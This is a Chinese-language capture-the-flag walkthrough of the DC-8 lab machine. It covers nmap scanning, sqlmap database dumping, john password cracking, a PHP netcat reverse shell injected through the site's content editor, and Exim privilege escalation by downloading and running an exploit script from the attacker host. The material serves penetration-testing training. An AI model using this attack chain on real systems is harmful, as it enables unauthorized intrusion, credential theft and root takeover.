DC系列靶机丨DC8
字数 726 2025-08-11 17:40:08
DC8靶机渗透测试教学文档
信息收集阶段
1. 网络发现
使用netdiscover工具扫描本地网络,确定目标IP地址:
netdiscover -i eth0 -r 192.168.84.0/24
2. 端口扫描
使用nmap进行基本端口扫描:
nmap 192.168.84.184
3. 漏洞扫描
针对特定端口进行漏洞扫描(本例中为80端口):
nmap 192.168.84.184 -p 80 --script=vuln
Web应用测试
1. SQL注入检测
发现目标网站可能存在SQL注入漏洞,使用sqlmap工具进行验证和利用:
- 枚举数据库:
sqlmap -u "目标URL" --dbs
- 枚举特定数据库的表:
sqlmap -u "目标URL" -D 数据库名 --tables
- 枚举表中的字段:
sqlmap -u "目标URL" -D 数据库名 -T 表名 --columns
- 提取数据:
sqlmap -u "目标URL" -D 数据库名 -T 表名 -C "字段1,字段2" --dump
2. 密码破解
获取到用户凭证哈希后,使用john进行破解:
john --wordlist=/usr/share/john/password.lst --rules dc8.txt
成功获取账户密码:john:turtle
获取初始访问权限
1. 反弹shell
- 登录后,在文章编辑处插入PHP反弹shell代码:
<?php exec("nc -e /bin/bash 192.168.84.174 10086"); ?>
- 在攻击机上监听端口:
nc -lvnp 10086
- 在网站上提交包含恶意代码的内容(如邮件表单)
2. 获取shell
成功获取目标系统的shell访问权限
权限提升
1. 查找SUID提权机会
find / -user root -perm -4000 -print 2>/dev/null
发现exim4可能具有SUID提权机会
2. Exim4提权分析
- 检查Exim版本:
exim --version
确认版本为4.0以上
- 搜索已知漏洞:
- 查找Exim 4.x的历史漏洞
- 发现可能适用的提权漏洞(如CVE-2010-4344等)
3. 利用漏洞提权
- 在攻击机上设置HTTP服务:
python3 -m http.server 80
- 在目标机上下载漏洞利用脚本:
wget http://攻击机IP/46996.sh
- 添加执行权限并运行:
chmod +x 46996.sh
./46996.sh
获取flag
成功提权后,查找并读取flag文件
关键工具总结
- 网络扫描:
netdiscover,nmap - Web测试:
sqlmap - 密码破解:
john - 反弹shell:
nc - 提权:Exim漏洞利用
注意事项
- 所有操作应在授权环境下进行
- 注意记录每个步骤的结果
- 提权前应充分了解目标系统环境
- 使用漏洞利用脚本前应检查其安全性